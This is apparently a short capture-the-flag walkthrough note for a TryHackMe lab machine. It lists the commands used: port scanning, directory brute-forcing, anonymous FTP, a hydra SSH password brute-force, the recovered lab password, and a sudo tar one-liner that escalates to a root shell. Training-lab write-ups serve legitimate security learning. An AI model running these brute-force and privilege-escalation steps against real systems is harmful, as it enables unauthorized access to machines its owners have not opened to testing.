Last updated 6 months ago
Room Link: https://tryhackme.com/room/cowboyhacker
nmap -A $VICTIM
No other ports found.
nmap -p- $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
anonymous login works
Kali
ftp $VICTIM Username: anonymous
hydra -l lin -P locks.txt ssh://$VICTIM
Username: lin Password: RedDr4gonSynd1cat3
ssh lin@$VICTIM
Exploit Link: https://gtfobins.github.io/gtfobins/tar/
Victim
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
